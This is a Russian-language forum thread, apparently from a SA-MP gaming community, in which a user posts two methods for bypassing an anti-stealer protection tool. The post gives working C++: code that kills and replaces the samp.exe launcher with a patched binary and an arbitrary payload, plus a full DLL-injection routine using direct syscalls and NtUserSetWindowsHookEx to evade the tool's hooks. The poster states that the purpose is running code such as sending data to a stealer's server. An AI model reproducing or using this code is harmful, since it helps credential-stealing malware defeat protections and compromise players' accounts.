[WARNING] > [InternetCreateUrlW] > [C:\Windows\SYSTEM32\WININET.DLL] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\SYSTEM32\WININET.DLL] > {pName: blast.hk}
[WARNING] > [gethostbyname] > [C:\Games\GTA San Andreas Multiplayer\samp.dll] > {name: Computer}
[WARNING] > [gethostbyname] > [C:\Games\GTA San Andreas Multiplayer\samp.dll] > {name: 5.254.123.4}
[WARNING] > [gethostbyname] > [C:\Games\GTA San Andreas Multiplayer\samp.dll] > {name: 5.254.123.4}

Можно обновленный антистиллер для сампа пожалуйста! без стилерров

Здравствуйте админы! Можно пожалуйста новый антистиллер обновленный
Все чисто.
 

Clark_Morello

Участник
172
43
@DarkP1xel
###### Способ обхода Анти-стиллера v5.2.5 > №1 < (Для извращенцев вроде меня) ###########
Обход на поиск ида процесса (Можно сделать по нормальному через win32u.dll на NtUserFindWindowEx)
C++:
DWORD __stdcall GetProcID(const char* CaptionName)
{
    for (HWND hwnd = 0; hwnd < (HWND)20000000; hwnd++)
    {
        char strQ[256]; memset(strQ, 0, sizeof(strQ));
        GetWindowTextA(hwnd, strQ, 256);
        if (strstr(strQ, CaptionName) != nullptr)
        {
            DWORD procID = 0; GetWindowThreadProcessId(hwnd, &procID);
            if (procID != 0) return procID;
        }
    }
    return -1;
}
Обход через замену оригинального samp.exe на пропатченый с запуском своего процесса. (Получится так что на следующий вход в самп будет выполнен ваш процесс).
C++:
auto DropExecutablePayload = [](const char *path, unsigned char *bin, SIZE_T size) -> void
{
        HANDLE hFile = CreateFileA(path, GENERIC_READ | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        HANDLE hFilemap = CreateFileMappingA(hFile, NULL, PAGE_READWRITE, 0, size, NULL);
        LPVOID lpBaseAddress = MapViewOfFile(hFilemap, FILE_MAP_WRITE, 0, 0, 0);
        CopyMemory(lpBaseAddress, bin, size);
        UnmapViewOfFile(lpBaseAddress); CloseHandle(hFilemap); CloseHandle(hFile);
};
DWORD ProcID = GetProcID("San Andreas Multiplayer 0.3.7");
auto GetThreadID = [&, ProcID]() -> DWORD
{
    THREADENTRY32 th32; HANDLE hSnapshot = NULL; th32.dwSize = sizeof(THREADENTRY32);
    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (Thread32First(hSnapshot, &th32))
    {
        do
        {
            if (th32.th32OwnerProcessID != ProcID) continue;
            return th32.th32ThreadID;
        } while (Thread32Next(hSnapshot, &th32));
    }
    if (hSnapshot != INVALID_HANDLE_VALUE) CloseHandle(hSnapshot);
    return 0;
};
HANDLE pThread = OpenThread(THREAD_ALL_ACCESS, FALSE, GetThreadID());
if (pThread)
{
    SuspendThread(pThread); CONTEXT ctx; ctx.ContextFlags = CONTEXT_ALL;
    GetThreadContext(pThread, &ctx); ctx.Eip = (DWORD)&ExitProcess; // Захлопываем samp.exe процесс для его замены на свой ехешник.
    SetThreadContext(pThread, &ctx); ResumeThread(pThread); CloseHandle(pThread);
}
DeleteFileA("rcon.exe"); DeleteFileA("samp.exe");
DropExecutablePayload("rcon.exe", binary, sizeof(binary)); // binary - unsigned char буффер с кодом вашего ехешника (shell-код генерируем сами).
DropExecutablePayload("samp.exe", binary2, sizeof(binary2)); // binary2 - unsigned char буффер с пропатченым лаунчером (shell-код генерируем сами).
// Распаковываем samp.exe с помощью UPX через батник
C++:
upx.exe -d samp.exe
pause
Открываем лаунчер samp.exe в дебагере и переходим по данному адресу - 0x4EAC83
Смотрим карту памяти и наблюдаем что свободная память имеет права на исполнение.
Посмотреть вложение 32569
Пишем по адресу точки входа прыжок на наш адрес
Посмотреть вложение 32570
Переходим по адресу 0x4EAC83 и пишем следующий патч
Посмотреть вложение 32571
Сохраняем патч и упаковываем samp.exe с помощью UPX.
Генерируем шелл код с его .ехе файла и добавляем в проект.

###### Способ обхода Анти-стиллера v5.2.5 > №2 < (Был обнаружен мной совершенно недавно) ###########
Суть в инжекте cвоей DLL в лаунчер сампа и выполнения оттуда своего произвольного кода - например отправка данных на сервер стиллера.
Связывание DLL с процессом GTA:SA можно сделать любым удобным вам способом - я выбрал реестр.
Сам метод инжекта основан на SetWindowsHook методике, однако эта вин апи была пропатчена ещё в более ранних версиях анти-стиллера.
Только вот автор забыл про то что это всего лишь враппер и реализация самой функции находится внутри win32u.dll которая реализует системный вызов.
По этому будем использовать нативные функции с неё, то что нам нужно NtUserSetWindowsHookEx
C++:
#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN
#endif
#ifndef _CRT_SECURE_NO_WARNINGS
#define _CRT_SECURE_NO_WARNINGS
#endif
#pragma warning(disable : 4244)
#pragma warning(disable : 4005)
#pragma warning(disable : 4477)
#pragma warning(disable : 4311)
#pragma warning(disable : 4302)
#pragma warning(disable : 4313)
#include <Windows.h>
#include <stdio.h>
#include <map>
#include <winternl.h>
#define ADD_RVA true
using namespace std;
typedef HHOOK(__stdcall *NtUserSetWindowsHookExP)(HINSTANCE Mod, PUNICODE_STRING UnsafeModuleName, DWORD ThreadId,
INT HookId, PVOID HookProc, BOOL Ansi);
#define MakePtr( cast, ptr, addValue ) (cast)( (DWORD)(ptr) + (DWORD)(addValue))
#define GetImgDirEntryRVA( pNTHdr, IDE ) \
(pNTHdr->OptionalHeader.DataDirectory[IDE].VirtualAddress)
#define GetImgDirEntrySize( pNTHdr, IDE ) \
(pNTHdr->OptionalHeader.DataDirectory[IDE].Size)
LPVOID GetSectionPtr(PSTR name, PIMAGE_NT_HEADERS pNTHeader, DWORD imageBase)
{
    PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(pNTHeader);
    for (unsigned i = 0; i < pNTHeader->FileHeader.NumberOfSections; i++, section++)
    {
        if (strncmp((char *)section->Name, name, IMAGE_SIZEOF_SHORT_NAME) == 0)
        return (LPVOID)(section->PointerToRawData + imageBase);
    }
    return 0;
}
PIMAGE_SECTION_HEADER GetEnclosingSectionHeader(DWORD rva, PIMAGE_NT_HEADERS pNTHeader)
{
    PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(pNTHeader);
    for (unsigned i = 0; i < pNTHeader->FileHeader.NumberOfSections; i++, section++)
    {
        if ((rva >= section->VirtualAddress) && (rva < (section->VirtualAddress + section->Misc.VirtualSize))) return section;
    }
    return 0;
}
LPVOID GetPtrFromRVA(DWORD rva, PIMAGE_NT_HEADERS pNTHeader, DWORD imageBase)
{
    PIMAGE_SECTION_HEADER pSectionHdr; INT delta;
    pSectionHdr = GetEnclosingSectionHeader(rva, pNTHeader);
    if (!pSectionHdr) return 0;
    delta = (INT)(pSectionHdr->VirtualAddress - pSectionHdr->PointerToRawData);
    return (PVOID)(imageBase + rva - delta);
}
DWORD DumpExportsSection(DWORD base, PIMAGE_NT_HEADERS pNTHeader, const char *func)
{
    PIMAGE_EXPORT_DIRECTORY exportDir; PIMAGE_SECTION_HEADER header;
    INT delta; PSTR filename; DWORD i; PDWORD functions; PWORD ordinals; PSTR *name;
    DWORD exportsStartRVA, exportsEndRVA;
    exportsStartRVA = GetImgDirEntryRVA(pNTHeader, IMAGE_DIRECTORY_ENTRY_EXPORT);
    exportsEndRVA = exportsStartRVA + GetImgDirEntrySize(pNTHeader, IMAGE_DIRECTORY_ENTRY_EXPORT);
    header = GetEnclosingSectionHeader(exportsStartRVA, pNTHeader);
    if (!header) return 0;
    delta = (INT)(header->VirtualAddress - header->PointerToRawData);
    exportDir = MakePtr(PIMAGE_EXPORT_DIRECTORY, base, exportsStartRVA - delta);
    filename = (PSTR)(exportDir->Name - delta + base);
    functions = (PDWORD)((DWORD)exportDir->AddressOfFunctions - delta + base);
    ordinals = (PWORD)((DWORD)exportDir->AddressOfNameOrdinals - delta + base);
    name = (PSTR *)((DWORD)exportDir->AddressOfNames - delta + base);
    for (i = 0; i < exportDir->NumberOfFunctions; i++)
    {
        DWORD entryPointRVA = functions[i]; DWORD j;
        if (entryPointRVA == 0) continue;
        for (j = 0; j < exportDir->NumberOfNames; j++)
        {
            if (ordinals[j] == i)
            {
                char fname[55]; sprintf(fname, "%s", name[j] - delta + base);
                if (strstr(fname, func) != 0) return entryPointRVA;
            }
        }
    }
    return 0;
}
DWORD GetExportAddress(const char *module, const char *function, bool add_rva = false)
{
    decltype(auto) ReturnSystemPath = [](const char *dllname)
    {
        BOOL bIsWow64 = FALSE; char syspath[256];
        typedef BOOL(WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
        LPFN_ISWOW64PROCESS fnIsWow64Process;
        fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
        if (NULL != fnIsWow64Process)
        {
            if (!fnIsWow64Process(GetCurrentProcess(), &bIsWow64)) {}
        }
        sprintf(syspath, "C:\\Windows\\%s\\%s", (bIsWow64 ? "SysWOW64" : "System32"), dllname);
        return string(syspath);
    };
    auto getFileSize = [](FILE *file)
    {
        long lCurPos, lEndPos;
        lCurPos = ftell(file);
        fseek(file, 0, 2);
        lEndPos = ftell(file);
        fseek(file, lCurPos, 0);
        return lEndPos;
    };
    FILE *hFile = fopen(ReturnSystemPath(module).c_str(), "rb");
    BYTE *fileBuf; long fileSize;
    fileSize = getFileSize(hFile);
    fileBuf = new BYTE[fileSize];
    fread(fileBuf, fileSize, 1, hFile);
    fclose(hFile);
    PIMAGE_NT_HEADERS pNTHeader;
    IMAGE_DOS_HEADER* dosHeader = (IMAGE_DOS_HEADER*)fileBuf;
    DWORD base = (DWORD)dosHeader;
    pNTHeader = MakePtr(PIMAGE_NT_HEADERS, dosHeader, dosHeader->e_lfanew);
    DWORD funcAddr = 0;
    if (add_rva) funcAddr = ((DWORD)GetModuleHandleA(module) + DumpExportsSection(base, pNTHeader, function));
    else funcAddr = DumpExportsSection(base, pNTHeader, function);
    delete[] fileBuf; return funcAddr;
}
namespace LibCall
{
    DWORD __stdcall GetSafeAddress(const char* dllname, const char* func_name, DWORD *syscall, bool prologue = true)
    {
        decltype(auto) ReturnSystemPath = [](const char *dllname)
        {
            BOOL bIsWow64 = FALSE; char syspath[256];
            typedef BOOL(WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
            LPFN_ISWOW64PROCESS fnIsWow64Process;
            fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
            if (NULL != fnIsWow64Process)
            {
                if (!fnIsWow64Process(GetCurrentProcess(), &bIsWow64)) {}
            }
            sprintf(syspath, "C:\\Windows\\%s\\%s", (bIsWow64 ? "SysWOW64" : "System32"), dllname);
            return string(syspath);
        };
        auto getFileSize = [](FILE *file)
        {
            long lCurPos, lEndPos;
            lCurPos = ftell(file);
            fseek(file, 0, 2);
            lEndPos = ftell(file);
            fseek(file, lCurPos, 0);
            return lEndPos;
        };
        FILE *hFile = fopen(ReturnSystemPath(dllname).c_str(), "rb");
        BYTE *fileBuf; long fileSize;
        fileSize = getFileSize(hFile);
        fileBuf = new BYTE[fileSize];
        fread(fileBuf, fileSize, 1, hFile);
        fclose(hFile); char newname[256];
        sprintf(newname, "proxy_%s", dllname);
        hFile = fopen(newname, "wb");
        fwrite(fileBuf, 1, fileSize, hFile);
        delete[] fileBuf; fclose(hFile);
        LoadLibraryExA(newname, 0, DONT_RESOLVE_DLL_REFERENCES);
        HMODULE BaseAddress = GetModuleHandleA(newname);
        DWORD FuncAddr = (DWORD)GetExportAddress(dllname, func_name, ADD_RVA);
        if (syscall != nullptr)
        {
            DWORD oldP; VirtualProtect((void*)FuncAddr, 4, PAGE_EXECUTE_READWRITE, &oldP);
            DWORD RVA = (DWORD)GetExportAddress(dllname, func_name);
            memcpy(syscall, (void*)((RVA + (DWORD)BaseAddress) + 0x1), 1);
            VirtualProtect((void*)FuncAddr, 4, oldP, &oldP);
        }
        if (!prologue) FuncAddr += 0x5;
        FreeLibrary(BaseAddress); DeleteFileA(newname);
        return FuncAddr;
    }
    constexpr DWORD SYSCALL_SIZE = 15;
    DWORD __stdcall CreateSystemCall(const char *procedure)
    {
        PVOID delegate = VirtualAlloc(0, SYSCALL_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        DWORD service_number = 0x0, service_address = GetSafeAddress("ntdll.dll", procedure, &service_number, true);
        memcpy(delegate, (void*)service_address, 15);
        BYTE instruction[5] = { 0xB8, 0x00, 0x00, 0x00, 0x00 };
        memcpy(&instruction[1], &service_number, 4);
        memcpy(delegate, instruction, 5);
        memcpy((void*)((DWORD)delegate + 0x5), (void*)(service_address + 0x5), 5);
        return (DWORD)delegate;
    }
    bool __stdcall DestroySystemCall(DWORD address)
    {
        return VirtualFree((void*)address, 0, MEM_RELEASE);
    }
}
void __stdcall EntryPoint()
{
    auto GetProcessIdAndTid = []() -> map<DWORD, DWORD>
    {
        DWORD procID = NULL, TID = NULL;
        for (HWND hwnd = 0; hwnd < (HWND)20000000; hwnd++)
        {
            char strQ[256]; memset(strQ, 0, sizeof(strQ));
            GetWindowTextA(hwnd, strQ, 256);
            if (strstr(strQ, "San Andreas Multiplayer 0.3.7") != nullptr)
            {
                TID = GetWindowThreadProcessId(hwnd, &procID);
                if (procID != 0) break;
            }
        }
        return map<DWORD, DWORD> { pair<DWORD, DWORD>(procID, TID) };
    };
    map<DWORD, DWORD> ProcessData = GetProcessIdAndTid();
    HMODULE dll = LoadLibraryExA("test.dll", NULL, DONT_RESOLVE_DLL_REFERENCES);
    if (dll == nullptr) return;
    HOOKPROC addr = (HOOKPROC)GetProcAddress(dll, "NextHook");
    if (addr == nullptr) return;
    NtUserSetWindowsHookExP NtUserSetWindowsHookEx = (NtUserSetWindowsHookExP)
    GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserSetWindowsHook");
    typedef void(__stdcall *RtlInitUnicodeStringP)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
    RtlInitUnicodeStringP RtlInitUnicodeString = (RtlInitUnicodeStringP)
    LibCall::CreateSystemCall("RtlInitUnicodeString");
    for (const auto& it : ProcessData)
    {
        UNICODE_STRING strZ; RtlInitUnicodeString(&strZ, L"test.dll");
        HHOOK HookEx = NtUserSetWindowsHookEx(dll, &strZ, it.second, WH_GETMESSAGE, addr, 1);
        if (HookEx != nullptr)
        {
            PostThreadMessageA(it.second, WM_NULL, NULL, NULL);
        }
    }
    LibCall::DestroySystemCall((DWORD)RtlInitUnicodeString);
}
int __stdcall DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        CreateThread(0, 0, (LPTHREAD_START_ROUTINE)EntryPoint, 0, 0, 0);
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return 1;
}
Добавляем себе в DLL
C++:
extern "C" __declspec(dllexport) int NextHook(int code, WPARAM wParam, LPARAM lParam)
{
    return CallNextHookEx(NULL, code, wParam, lParam);
}
 
Статус
В этой теме нельзя размещать новые ответы.